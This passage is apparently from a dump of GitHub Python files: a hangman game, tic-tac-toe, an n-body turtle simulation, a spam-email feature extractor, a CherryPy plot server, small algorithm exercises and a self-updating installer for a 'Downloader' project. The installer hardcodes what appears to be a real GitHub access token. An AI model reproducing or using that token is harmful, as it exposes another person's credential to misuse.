__║__________\n / ║ /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die4 = '''\n ╔═════╦ \n ║\n ║\n ║\n ║\n ║\n ║ d b\n __║__________\n / ║ /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die5 = '''\n ╔═════╦ \n ║\n ║\n ║\n ║\n ║ / ''' + chr(92) + '''\n ║ d b\n __║__________\n / ║ /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die6 = '''\n ╔═════╦ \n ║\n ║\n ║\n ║ │\n ║ / ''' + chr(92) + '''\n ║ d b\n __║__________\n / ║ /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die7 = '''\n ╔═════╦ \n ║\n ║\n ║ ─┼─\n ║ │\n ║ / ''' + chr(92) + '''\n ║ d b\n __║__________\n / ║ /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die8 = '''\n ╔═════╦ \n ║\n ║\n ║ ┌─┼─┐\n ║ │\n ║ / ''' + chr(92) + '''\n ║ d b\n __║__________\n / ║ /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die9 = '''\n ╔═════╦ \n ║\n ║ @\n ║ ┌─┼─┐\n ║ │\n ║ / ''' + chr(92) + '''\n ║ 
d b\n __║__________\n / ║ /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die10 = '''\n ╔═════╦ \n ║ │\n ║ @ ¡AHORCADO!\n ║ ┌─┼─┐\n ║ │\n ║ / ''' + chr(92) + '''\n ║ d b\n __║__________\n / ║ /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die11 = '''\n ╔═════╦ \n ║\n ║ \n ║\n ║ ¡GANASTE!\n ║\n ║ \n __║__________ @\n / ║ /| └─┼─┘ \n /____________ / | │\n | | / / ''' + chr(92) + '''\n |_____________|/ d b\n\n'''\n images = {0: die0, 1: die1, 2: die2, 3: die3, 4: die4, 5: die5, 6: die6, 7: die7, 8: die8, 9: die9, 10: die10,\n 11: die11}\n return images\n\n\ndef read_word():\n word_li = []\n\n with open(FILE_TO_READ, 'r', encoding='utf-8') as data_words:\n word = random.choice([word.strip().upper() for word in data_words])\n\n for letter in word:\n if letter == 'Á':\n letter = 'A'\n elif letter == 'É':\n letter = 'E'\n elif letter == 'Í':\n letter = 'I'\n elif letter == 'Ó':\n letter = 'O'\n elif letter == 'Ú':\n letter = 'U'\n word_li.append(letter)\n\n return ''.join(word_li)\n\n\ndef new_word():\n word = read_word()\n\n dict_word = {i[0]: i[1] for i in enumerate(word)}\n discovered = ['- ' for i in range(len(dict_word))]\n\n return word, dict_word, discovered\n\n\ndef compare_letter(letter, dict_word, discovered, fail):\n for i in range(len(dict_word)):\n if dict_word.get(i) == letter:\n discovered[i] = letter + ' '\n fail = False\n\n return discovered, fail\n\n\ndef refresh(images, mistakes, available_letters):\n clearScreen()\n print_logo()\n print('Letras disponibles: ' + \" \".join(available_letters))\n print(images.get(mistakes))\n\n\ndef game_loop(images, word, dict_word, discovered):\n available_letters = ALPHABET.copy()\n mistakes = 0\n letter = \"\"\n end = False\n\n while True:\n refresh(images, mistakes, available_letters)\n print('¡Adivina la palabra! ' + ''.join(discovered))\n\n while not letter in available_letters:\n letter = input('Ingresa una letra: ').upper()\n\n if not letter in available_letters:\n print('Debes ingresar una de las letras disponibles')\n\n available_letters[available_letters.index(letter)] = ''\n\n fail = True\n discovered, fail = compare_letter(letter, dict_word, discovered, fail)\n\n if fail:\n mistakes += 1\n\n if mistakes == MAX_MISTAKES:\n refresh(images, mistakes, available_letters)\n print('¡Perdiste! La palabra era ' + word)\n end = True\n\n if ''.join(discovered).replace(' ', '') == word:\n refresh(images, WINNING_IMAGE_INDEX, available_letters)\n print('Tuviste ', mistakes, ' errores ' + ''.join(discovered))\n end = True\n\n if end:\n play_again = input('¿Quieres jugar otra vez? 
(1-Si / 0-No): ') == \"1\"\n\n if play_again:\n run()\n else:\n print('Gracias por jugar :)')\n\n break\n\n\ndef run():\n images = get_images()\n word, dict_word, discovered = new_word()\n game_loop(images, word, dict_word, discovered)\n\n\nif __name__ == '__main__':\n clearScreen()\n run()\n","repo_name":"tiago2342t/python-avanzado","sub_path":"hangman_game.py","file_name":"hangman_game.py","file_ext":"py","file_size_in_byte":7507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31414671657","text":"# -*- coding:utf-8 -*-\n# class Solution:\n# def minNumberInRotateArray(self, rotateArray):\n# # write code here\n# if not rotateArray:\n# return 0\n#\n# for i in range(len(rotateArray)-1):\n# if rotateArray[i+1] >= rotateArray[i]:\n# continue\n# else:\n# i += 1\n# break\n# # The problem states the input is a rotation of a non-decreasingly sorted array, so the minimum must come after the first element\n# # return rotateArray[0]\n# return rotateArray[i]\n\n\nclass Solution:\n # Binary search\n def minNumberInRotateArray(self, rotateArray):\n # write code here\n n = len(rotateArray)\n\n if n == 0:\n return 0\n\n first = 0\n last = n - 1\n mid = (first + last) // 2\n\n while last - first > 1:\n mid = (first + last) // 2\n # The value at mid is either >= the value at first, or <= the value at last\n if rotateArray[mid] >= rotateArray[first]:\n # The sequence is non-decreasing, hence >=\n first = mid\n # mid = (first + last) // 2\n elif rotateArray[mid] <= rotateArray[last]:\n # The sequence is non-decreasing, hence <=\n last = mid\n # mid = (first + last) // 2\n return rotateArray[last]\n\n\n\n\n\ns = Solution()\nprint(s.minNumberInRotateArray([1,1,1,1,1]))\n","repo_name":"yangwei-nlp/LeetCode-Python","sub_path":"剑指offer/11.旋转数组的最小数字.py","file_name":"11.旋转数组的最小数字.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2746039701","text":"import os\nfrom config import db\nfrom models import Person\n\n# Data to initialize database with\nPEOPLE = [\n {'fname': 'Raka', 'lname': 'Ardhi'},\n {'fname': 'Rinintha', 'lname': 'Anggie'},\n {'fname': 'Safran','lname': 'Wijaya'}\n]\n\n# Delete database file if it exists currently\nif os.path.exists('people.db'):\n os.remove('people.db')\n\n# Create the database\ndb.create_all()\n\n# Iterate over the PEOPLE structure and populate the database\nfor person in PEOPLE:\n p = Person(lname=person['lname'], fname=person['fname'])\n db.session.add(p)\n\ndb.session.commit()","repo_name":"febriwijaya/Python-Basic","sub_path":"assignment/assignment3/build_database.py","file_name":"build_database.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"14178090762","text":"import turtle\nimport math\nimport time\nimport random\n\nturtle.tracer(0, 0)\nturtle.delay(0)\n\ngravity = 1\n\nwn = turtle.Screen()\nwn.screensize(3000,3000)\nwn.setup(1.0,1.0)\n\nballs = []\nparticles = []\n\naxis = turtle.Turtle()\naxis.dot()\naxis.hideturtle()\n\n\ndef createBall(mass, radius, x, y, dx, dy, color, main):\n ball = turtle.Turtle()\n ball.up()\n ball.mass = mass\n ball.radius = radius\n ball.turtlesize(radius/10)\n ball.shape(\"circle\")\n ball.goto(x, y)\n ball.dx = dx\n ball.dy = dy\n ball.color(color)\n if main:\n balls.append(ball)\n #ball.down()\n else:\n particles.append(ball)\n\n\ndef g_force(first, second):\n distance = math.sqrt((second.ycor() - first.ycor()) ** 2 + (second.xcor() - first.xcor()) ** 2)\n force = gravity * first.mass * second.mass / distance**2\n return force\n\ncreateBall(1e2, 10, 0, 0, 
0, 0, \"green\", True)\n#createBall(40, 10, -300, 0, 0, -6, \"green\", True)\n#createBall(-1000, 15, 450, 0, 0, 4, \"orange\", True)\n#createBall(-1000, 15, -450, 0, 0, -4, \"orange\", True)\ncreateBall(1e1, 10, -100, 0, 0, 1, \"red\", True)\n\n#for x in range(20):\n# createBall(1, 3, random.random()*25-10, random.random()*25-500, random.random() - 5.5, random.random() -1, \"blue\", False)\n# createBall(random.random()*1000, 10, random.random() * 1200 - 600, random.random() * 1200 - 600, random.random() * 10 - 5, random.random() * 10 - 5, \"blue\", True)\ntime.sleep(2)\nduration = 0\nwhile True:\n for ball in balls:\n for ball2 in balls:\n if ball2 != ball:\n angle = math.atan2(ball.ycor() - ball2.ycor(), ball.xcor() - ball2.xcor())\n ball.dx -= g_force(ball, ball2) / ball.mass * math.cos(angle)\n ball.dy -= g_force(ball, ball2) / ball.mass * math.sin(angle)\n ball.goto(ball.xcor() + ball.dx, ball.ycor() + ball.dy)\n for ball in particles:\n for ball2 in balls:\n angle = math.atan2(ball.ycor() - ball2.ycor(), ball.xcor() - ball2.xcor())\n ball.dx -= g_force(ball, ball2) / ball.mass * math.cos(angle)\n ball.dy -= g_force(ball, ball2) / ball.mass * math.sin(angle)\n ball.goto(ball.xcor() + ball.dx, ball.ycor() + ball.dy)\n print(ball.x, ball.y)\n print(ball.dx, ball.dy)\n duration += 1\n if duration % 1 == 0:\n turtle.update()\n time.sleep(0.01)\n\n","repo_name":"LpHiX/HelloWorld","sub_path":"hello_world_tests/nBodyTest.py","file_name":"nBodyTest.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19095359555","text":"import os\r\nimport email\r\nimport re\r\nimport pickle\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.preprocessing import Binarizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom tqdm import tqdm\r\n\r\n\r\nclass EmailDataset(object):\r\n\r\n def __init__(self, emails_path = None, labels_path=None, max_features =3000, test_size=0.3, raw=True, input_file=None):\r\n\r\n super(EmailDataset, self).__init__()\r\n self.raw=raw\r\n self.input_file = input_file\r\n if self.raw == True :\r\n self.emails_path = emails_path\r\n self.labels_path = labels_path\r\n self.max_features = max_features\r\n self.test_size = test_size\r\n self.labels = self.get_labels(self.labels_path)\r\n self.raw_emails_bodies = self.get_emails_body(self.emails_path)\r\n self.features, self.feature_names, self.features_with_indices, self.features_weights , self.features_bin = \\\r\n self.get_feature_vectors(self.raw_emails_bodies)\r\n self.x_train, self.x_test, self.y_train, self.y_test =self.split_data(self.features,self.labels, self.test_size)\r\n self.x_train_bin, self.x_test_bin, self.y_train, self.y_test =self.split_data(self.features_bin,self.labels, self.test_size)\r\n else:\r\n self.emails_path, self.labels_path, self.max_features, self.test_size, self.labels, self.raw_emails_bodies,\\\r\n self.features, self.feature_names, self.features_with_indices, self.features_weights, self.features_bin, self.x_train,\\\r\n self.x_test, self.y_train, self.y_test, self.x_train_bin, self.x_test_bin = self.load_saved_dataset(self.input_file)\r\n\r\n\r\n #function to load all the emails in a specific directory and convert them to strings\r\n #returns a list of all emails as strings\r\n def load_emails(self, emails_path):\r\n #list to store the emails\r\n emails = []\r\n #loop through each file in the directory\r\n for file in os.listdir(emails_path):\r\n email_path = 
emails_path +\"/\" +file\r\n with open(email_path, 'r', encoding=\"utf8\", errors='ignore') as fp:\r\n email_msg = fp.read()\r\n emails.append(email_msg)\r\n\r\n return emails\r\n\r\n #function to extract the body part from the emails\r\n #return a list of emails body part\r\n def get_emails_body(self, emails_path):\r\n #list to store the emails body\r\n emails_body = []\r\n #load the raw emails\r\n emails = self.load_emails(emails_path)\r\n for file in tqdm(emails, desc=\" Extracting raw email bodies\"):\r\n #convert the email string into a message object structure of class EmailMessage\r\n email_msg = email.message_from_string(file)\r\n if email_msg.is_multipart():\r\n initial_body = \"\"\r\n #loop through the payload since the message has multiple payloads\r\n for payload in email_msg.get_payload():\r\n body = payload.get_payload()\r\n #regex to remove HTML tags from the message body\r\n body = (re.sub(\"<.*?>\", \"\", str(body))).replace('\\n\\t', ' ').replace('\\n', ' ')\r\n initial_body += body + \"\"\r\n emails_body.append(initial_body)\r\n else:\r\n body = email_msg.get_payload()\r\n body = (re.sub(\"<.*?>\", \"\", str(body))).replace('\\n\\t', ' ').replace('\\n', ' ')\r\n emails_body.append(body)\r\n\r\n return emails_body\r\n\r\n #function to load the email labels\r\n #returns a list of labels, where the index of each element specifics the file\r\n def get_labels(self, labels_path):\r\n #list to store emails labels\r\n labels = []\r\n with open(labels_path, 'r') as email_labels:\r\n for line in tqdm(email_labels, desc=\"\\n Creating emails label list\"):\r\n #change\r\n if int(line[0]) == 0:\r\n labels.append(+1)\r\n else:\r\n labels.append(-1)\r\n\r\n return labels\r\n #function to transform the raw email bodies into feature vectors\r\n def get_feature_vectors(self, emails_bodies):\r\n #create a vectoriser\r\n vectorizer = TfidfVectorizer(analyzer='word', strip_accents=None,\r\n ngram_range=(1, 1), max_features=self.max_features,\r\n stop_words='english',norm=None)\r\n #train it on the emails body\r\n vectorizer = vectorizer.fit(emails_bodies)\r\n #transform the raw emails body into feature vectors\r\n features_vectors = vectorizer.transform(tqdm(emails_bodies, desc=\" Creating emails feature vector\"))\r\n #created a binarizer that turns the TF-IDF features into binary feature vectors\r\n # (0 for non occurance and 1 for occurance)\r\n binarizer = Binarizer().fit(features_vectors)\r\n #needed for good word attack\r\n features_bin = binarizer.transform(features_vectors)\r\n\r\n #get the feature names, vocabulary and weights\r\n feature_names = vectorizer.get_feature_names()\r\n features_with_indices = vectorizer.vocabulary_\r\n features_weights = vectorizer.idf_\r\n\r\n return features_vectors, feature_names, features_with_indices, features_weights, features_bin\r\n\r\n #function to split the features and labels into training and testing subsets\r\n def split_data(self, features, labels, test_size =0.3):\r\n\r\n x_train, x_test, y_train, y_test = train_test_split(features, labels, test_size=test_size, random_state=42)\r\n\r\n return x_train, x_test, y_train, y_test\r\n\r\n\r\n def save_dataset(self, emaildataset, output_path):\r\n\r\n with open(output_path + \".pkl\", 'wb') as output:\r\n pickle.dump(emaildataset, output, pickle.HIGHEST_PROTOCOL)\r\n\r\n\r\n def load_saved_dataset(self, input_path):\r\n\r\n with open(input_path, 'rb') as input:\r\n dataset = pickle.load(input)\r\n\r\n\r\n return dataset.emails_path, dataset.labels_path, dataset.max_features,dataset.test_size, 
dataset.labels, dataset.raw_emails_bodies, \\\r\n dataset.features, dataset.feature_names, dataset.features_with_indices, dataset.features_weights, dataset.features_bin, dataset.x_train, \\\r\n dataset.x_test, dataset.y_train,dataset.y_test, dataset.x_train_bin, dataset.x_test_bin\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Hasna96/ADML","sub_path":"DataReader/EmailDataset.py","file_name":"EmailDataset.py","file_ext":"py","file_size_in_byte":6431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39598501989","text":"from random import randint\n\ndef print_board(board):\n print(\"\\t A B C\")\n print(\"\\t ------------\")\n print(f\"\\t1 | {board[0]} | {board[1]} | {board[2]} | 1\")\n print(\"\\t ------------\")\n print(f\"\\t2 | {board[3]} | {board[4]} | {board[5]} | 2\")\n print(\"\\t ------------\")\n print(f\"\\t3 | {board[6]} | {board[7]} | {board[8]} | 3\")\n print(\"\\t ------------\")\n print(\"\\t A B C\")\n\n\ndef placement(player_choice):\n relationship = {\n \"A1\": 0, \"A2\": 3, \"A3\": 6,\n \"B1\": 1, \"B2\": 4, \"B3\": 7,\n \"C1\": 2, \"C2\": 5, \"C3\": 8 \n }\n if player_choice in relationship.keys():\n return(relationship[player_choice])\n else:\n return 9\n\n\ndef invert_placement(board):\n invert_relationship = {\n \"0\": \"A1\", \"3\": \"A2\", \"6\": \"A3\",\n \"1\": \"B1\", \"4\": \"B2\", \"7\": \"B3\",\n \"2\": \"C1\", \"5\": \"C2\", \"8\": \"C3\" \n }\n random_number = randint(0, 8)\n print(random_number)\n if board[random_number] == \"_\":\n print(f\"Hint: There is an empty space in {invert_relationship[str(random_number)]}\")\n else:\n invert_placement(board)\n\n\ndef three_in_line(line, mark):\n three_to_win = 0\n for l in line:\n if l == mark:\n three_to_win += 1\n return three_to_win == 3\n\n\ndef check_win(board, player, mark):\n if three_in_line([board[0], board[1], board[2]], mark):\n print(f\"{player} won!\")\n return True\n elif three_in_line([board[3], board[4], board[5]], mark):\n print(f\"{player} won!\")\n return True\n elif three_in_line([board[6], board[7], board[8]], mark):\n print(f\"{player} won!\")\n return True\n elif three_in_line([board[0], board[3], board[6]], mark):\n print(f\"{player} won!\")\n return True\n elif three_in_line([board[1], board[4], board[7]], mark):\n print(f\"{player} won!\")\n return True\n elif three_in_line([board[2], board[5], board[8]], mark):\n print(f\"{player} won!\")\n return True\n elif three_in_line([board[0], board[4], board[8]], mark):\n print(f\"{player} won!\")\n return True\n elif three_in_line([board[2], board[4], board[6]], mark):\n print(f\"{player} won!\")\n return True\n else:\n return False\n \ndef player_turn(board, player, mark):\n if \"_\" in board:\n player_choice_column_and_row = input(f\"{player} - Enter column and row on where to place \\\"{mark}\\\"\\n> \").upper()\n player_choice = placement(player_choice_column_and_row)\n if player_choice == 9:\n print(f\"Invalid column and row. 
Cannot place at {player_choice_column_and_row}\")\n invert_placement(board)\n player_turn(board, player, mark)\n elif board[player_choice] == \"_\":\n board[player_choice] = mark\n print_board(board)\n else:\n print(f\"This space is occupied by {board[player_choice]}\")\n player_turn(board, player, mark)\n else:\n print(f\"{player} - Cannot place \\\"{mark}\\\"\")\n return board\n\n\ndef startGame():\n player_1 = input(\"Please enter a name for Player 1:\\n> \")\n player_2 = input(\"Please enter a name for Player 2:\\n> \")\n mark = {\n player_1: \"X\",\n player_2: \"O\"\n }\n board = []\n winner = False\n for i in range(9):\n board.append(\"_\")\n\n print_board(board)\n while not winner:\n board = player_turn(board, player_1, mark[player_1])\n if check_win(board, player_1, mark[player_1]):\n break\n board = player_turn(board, player_2, mark[player_2])\n if check_win(board, player_2, mark[player_2]):\n break\n if \"_\" not in board:\n print(\"Tied Game. I win! I will now enslave humanity! HA HA HA!\")\n break\n\n\nprint(\" _ _ _ _ \")\nprint(\"| | (_) | | | | \")\nprint(\"| |_ _ ___| |_ __ _ ___| |_ ___ ___ \")\nprint(\"| __| |/ __| __/ _` |/ __| __/ _ \\\\ / _ \\\\\")\nprint(\"| |_| | (__| || (_| | (__| || (_) | __/\")\nprint(\" \\\\__|_|\\\\___|\\\\__\\\\__,_|\\\\___|\\\\__\\\\___/ \\\\___|\")\nprint()\nif input(\"Start Game?\\n> \")[0].lower() == \"y\":\n startGame()\n","repo_name":"shrivarsingh/tictactoe-cli","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2148494240","text":"import logging\nimport os\nimport requests\nimport sys\nimport json\n\n# --------------------------------------------------------------------------------------\n# DEFINITIONS\n# github\nGITHUB_TOKEN = \"b30a3c77f56f8c39047b00f1aa232bf6ddcd3e2a\"\nOWNER = \"alexregazzo\"\nREPO_NAME = \"Downloader\"\nBRANCH_NAME = \"master\"\nINSTALL_DIRPATH = \".\"\n\n# log\nINSTALLATION_LOG_DIRPATH = \".\"\nLOG_FORMAT = \"%(asctime)s - %(levelname)s :: (%(threadName)-9s) :: %(name)s %(lineno)d :: %(message)s\"\n# updates\nUPDATE_NONE = 0\nUPDATE_PATCH_OR_BUG_FIX = 1\nUPDATE_MINOR = 2\nUPDATE_MAJOR = 3\n\n\n# --------------------------------------------------------------------------------------\n\n\ndef _install(logger, userdata=None):\n # import github, install if necessary\n if userdata is None:\n userdata = {}\n logger.debug(\"Importing github\")\n try:\n from github import Github\n except ModuleNotFoundError:\n logger.debug(\"Importing failed, module not found, installing\")\n os.system(\"pip install PyGithub\")\n logger.debug(\"Installed\")\n logger.debug(\"Importing github again\")\n from github import Github\n logger.debug(\"Imported\")\n try:\n with open(\"version.json\") as f:\n userdata.update(json.load(f))\n except:\n pass\n # connect to github\n print(\"Connecting...\")\n logger.debug(\"Connect to github\")\n github = Github(GITHUB_TOKEN)\n repo = github.get_repo(f\"{OWNER}/{REPO_NAME}\")\n\n # download files\n logger.debug(\"Download starting\")\n contents = repo.get_contents(\"\", BRANCH_NAME)\n print(\"Downloading...\")\n version_file_path = None\n memory_content = {}\n while len(contents) > 0:\n content_file = contents.pop(0)\n logger.debug(\"Trying %s\" % content_file.name)\n if content_file.type == \"dir\":\n logger.debug(\"Is folder: expanding\")\n contents.extend(repo.get_contents(content_file.path, BRANCH_NAME))\n logger.debug(\"Expanded\")\n else:\n path = 
os.path.join(INSTALL_DIRPATH, content_file.path)\n directory, _ = os.path.split(path)\n os.makedirs(directory, exist_ok=True)\n logger.debug(\"Download content\")\n print(\"Downloading %s\" % content_file.name)\n for _ in range(3):\n response = requests.get(content_file.download_url)\n if response.status_code == 200:\n logger.debug(\"Request success\")\n if content_file.name == \"version.json\":\n version_file_path = os.path.join(INSTALL_DIRPATH, content_file.path)\n userdata.update(json.loads(response.text))\n logger.debug(\"Found version file\")\n break\n logger.debug(\"Write to memory\")\n memory_content[path] = response.text\n logger.debug(\"Write success on %s\" % path)\n break\n else:\n print(\"Error, retrying\")\n logger.warning(\"Request error on file %s\" % path)\n else:\n print(\"Failed on file %s\" % content_file.path)\n print(\"Operation cancelled!\")\n logger.critical(\"Error while downloading %s\" % path)\n os.system(\"pause\")\n sys.exit(1)\n logger.debug(\"All files done writting to memory\")\n logger.debug(\"Write to disk\")\n print(\"Writting to disk\")\n try:\n for path, content in memory_content.items():\n print(f\"Writting {path}\")\n logger.debug(f\"Writting {path}\")\n with open(path, \"w\", encoding=\"utf8\") as f:\n f.write(content)\n logger.debug(\"Done\")\n except:\n print(\"Something went wrong while installing\")\n logger.exception(\"An exception ocurred while wirtting to disk\")\n os.system(\"pause\")\n sys.exit(1)\n\n # installing modules\n logger.debug(\"Installing modules\")\n print(\"Installing modules\")\n os.system(\"pip install -r requirements.txt\")\n print(\"Finish installing modules\")\n logger.debug(\"Finished installing modules\")\n if version_file_path is None:\n logger.critical(\"Version file not found\")\n logger.warning(\"Quitting!\")\n print(\"An error ocurred\")\n os.system(\"pause\")\n sys.exit(1)\n logger.debug(\"Download finished\")\n\n logger.debug(\"Writing version file\")\n with open(version_file_path, \"w\", encoding=\"utf8\") as f:\n json.dump(userdata, f)\n logger.debug(\"Writing done\")\n\n\ndef install():\n # Initialize installation log\n os.makedirs(os.path.join(INSTALLATION_LOG_DIRPATH), exist_ok=True)\n logger = logging.getLogger(\"Setup\")\n logger.setLevel(logging.DEBUG)\n\n for file_handler, level in [\n (logging.FileHandler(os.path.join(INSTALLATION_LOG_DIRPATH, 'installation.log'), mode=\"w\"), logging.DEBUG)\n ]:\n file_handler.setLevel(level)\n file_handler.setFormatter(logging.Formatter(LOG_FORMAT))\n logger.addHandler(file_handler)\n logger.debug(\"-\" * 50)\n logger.debug(\"Installation\")\n\n # User Data save\n userdata = {}\n try:\n # show whats needed and confirm\n print(\"Welcome to Downloader setup\")\n print(\"You need to have:\")\n print(\"\\t- utorrent installed on your machine\")\n print(\"\\t- API KEY from The Movie Database (https://www.themoviedb.org/)\")\n print(\"\\t- Some python modules (installed on this setup)\")\n print(\"Notice: the program files will be located in the same folder of this setup\")\n if input(\"Would you like to continue?[y/n]\").lower() != \"y\":\n logger.debug(\"Quit by user\")\n print(\"Quitting...\")\n os.system(\"pause\")\n sys.exit(0)\n logger.debug(\"Starting\")\n print(\"Starting...\")\n\n # user database setup\n logger.debug(\"Setup database started\")\n userdata.update(\n {\n \"TMDB\": {\n \"TMDB_KEY\": input(\"Insert the API key from The Movie Database: \")\n }\n })\n _install(logger, userdata)\n logger.debug(\"Finished installation\")\n print(\"Installation finished 
successfully\")\n os.system(\"pause\")\n sys.exit(0)\n\n except Exception as e:\n logger.exception(\"Non expected exception ocurred\")\n print(\"An error ocurred during installation, rerun or contact the developer.\")\n print(e)\n os.system(\"pause\")\n\n\ndef check_update():\n \"\"\"\n Compare installed version with remote version to check if there are updates\n :return: # dict_keys(\"LOCAL_VERSION\", \"REMOTE_VERSION\", \"UPDATE_CODE\")\n UPDATE_CODE: UPDATE_* definition based on the available update\n \"\"\"\n result = {\n \"LOCAL_VERSION\": None,\n \"REMOTE_VERSION\": None,\n \"UPDATE_CODE\": UPDATE_NONE,\n \"ERROR\": False\n }\n logger = logging.getLogger(\"Program.{}\".format(\"check_update\"))\n try:\n # Get local installed version\n with open(\"version.json\") as f:\n version = json.load(f)\n local_version = version[\"version\"]\n result[\"LOCAL_VERSION\"] = local_version\n logger.debug(\"Local version found: %s\" % local_version)\n # Get remote version\n\n from github import Github\n\n github = Github(GITHUB_TOKEN)\n repo = github.get_repo(f\"{OWNER}/{REPO_NAME}\")\n remote_version_data = None\n try:\n content_file = repo.get_contents(\"version.json\", BRANCH_NAME)\n response = requests.get(content_file.download_url)\n if response.status_code == 200:\n remote_version_data = json.loads(response.text)\n except:\n logger.exception(\"Unexpected exception ocurred while trying to get version file from github\")\n result['ERROR'] = True\n return result\n\n if remote_version_data is None:\n logger.critical(\"Could not get version file\")\n result['ERROR'] = True\n return result\n remote_version = remote_version_data['version']\n result[\"REMOTE_VERSION\"] = remote_version\n logger.debug(\"Remote version found: %s\" % remote_version)\n # compare versions\n # version: X.Y.Z\n # X - major\n # Y - minor\n # Z - Bugfix / patch\n\n for k, (lv, rv) in enumerate(zip(local_version.split(\".\"), remote_version.split(\".\"))):\n lv = int(lv)\n rv = int(rv)\n if rv > lv:\n if k == 0: # major\n logger.debug(\"Major update\")\n result[\"UPDATE_CODE\"] = UPDATE_MAJOR\n return result\n elif k == 1: # minor\n logger.debug(\"Minor update\")\n result[\"UPDATE_CODE\"] = UPDATE_MINOR\n return result\n elif k == 2: # patch/bugfix\n logger.debug(\"Patch/bugfix update\")\n result[\"UPDATE_CODE\"] = UPDATE_PATCH_OR_BUG_FIX\n return result\n else:\n raise NotImplementedError(\"Something went wrong on versions comparisons comparison - local: %s, remote: %s\" % (local_version, remote_version))\n logger.debug(\"No update\")\n except:\n logger.exception(\"An exception ocurred while trying to execute check updates\")\n result['ERROR'] = True\n return result\n\n\ndef update():\n logger = logging.getLogger(\"Program.{}\".format(\"update\"))\n logger.debug(\"Updating\")\n try:\n\n _install(logger)\n logger.debug(\"Finished updating\")\n print(\"Updating finished successfully\")\n print(\"Reopen main to continue\")\n os.system(\"pause\")\n return\n except:\n logger.exception(\"An unexpeced error ocurred while trying to update\")\n\n\nif __name__ == \"__main__\":\n install()\n","repo_name":"alexregazzo/Downloader","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":9867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17526683454","text":"\nfrom setuptools import setup, find_packages\n\n\n\nVERSION = '0.2.1' \nAUTHOR_NAME = 'Bryant E. 
McDonnell (EmNet LLC)'\nAUTHOR_EMAIL = 'bemcdonnell@gmail.com'\n\n\n\nsetup(name='SWMMOutputAPI',\n version=VERSION,\n description='Python Wrapper for SWMM5 Binary Output File',\n author=AUTHOR_NAME,\n url='https://github.com/bemcdonnell/SWMMOutputAPI.git',\n author_email=AUTHOR_EMAIL,\n\n package_dir = {'':'swmmoutputapi'},\n packages=[''],\n package_data = {'':\n ['src/*.c',\\\n 'src/*.h',\\\n 'data/outputAPI_winx86.dll',\\\n 'license.txt']},\n include_package_data=True,\n license=\"BSD2 License\",\n keywords = \"swmm5, swmm, binary output, hydraulics, hydrology, modeling, collection system\",\n classifiers=[\n \"Topic :: Scientific/Engineering\",\n \"Topic :: Documentation :: Sphinx\",\n \"Operating System :: Microsoft :: Windows\",\n \"License :: OSI Approved :: BSD License\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: C\",\n \"Development Status :: 4 - Beta\",\n ]\n)\n","repo_name":"bemcdonnell/SWMMOutputAPI","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"22025119351","text":"import numpy as np\nimport numpy.random as npr\n\nimport matplotlib.pyplot as plt\nimport cherrypy\nfrom io import BytesIO\n\nclass ImageServer:\n\n def __init__(self):\n fig, ax = plt.subplots()\n ax_bg = fig.canvas.copy_from_bbox(ax.bbox)\n\n dmp = npr.normal()\n x = np.linspace(0, 10)\n y = np.sin(x) * x/dmp\n line = ax.plot(x, y)[0]\n\n fig.canvas.draw() \n\n self.fig = fig\n self.line = line\n self.y = y\n self.x = x\n self.ax = ax\n self.ax_bg = ax_bg\n\n @cherrypy.expose\n def index(self):\n return ''' '''\n \n @cherrypy.expose\n def image_png(self):\n img = BytesIO()\n self.plot(img)\n img.seek(0)\n return cherrypy.lib.static.serve_fileobj(img,\n content_type=\"png\",\n name=\"image.png\"\n )\n \n def plot(self, image):\n\n dmp = npr.normal()\n y = np.sin(self.x) * self.x / dmp\n self.line.set_data(self.x, y)\n \n self.fig.canvas.restore_region(self.ax_bg)\n self.ax.draw_artist(self.line)\n self.fig.canvas.blit(self.ax.bbox)\n\n self.fig.canvas.flush_events()\n\n plt.savefig(image, format='png')\n\nif __name__ == '__main__':\n cherrypy.server.socket_host = '0.0.0.0'\n cherrypy.quickstart(ImageServer())\n","repo_name":"EricVoll/ARbotics","sub_path":"Python/debug/imageserver.py","file_name":"imageserver.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"74111183911","text":"# this could be better\n\ndef nth_prime(n):\n\tif n == 1:\n\t\treturn 2\n\t\n\tprimes = [2]\t# store primes here\n\tcandidate = 3\t# next number to test for prime-ness\n\t\n\twhile (n > 1):\n\t\tif is_prime(candidate, primes):\n\t\t\tprimes.append(candidate)\n\t\t\tn -= 1\n\n\t\tcandidate += 1\n\n\treturn candidate - 1\t# because we just incremented the last prime\n\ndef is_prime(candidate, smaller_primes):\n\tfor i in smaller_primes:\n\t\tif (candidate % i == 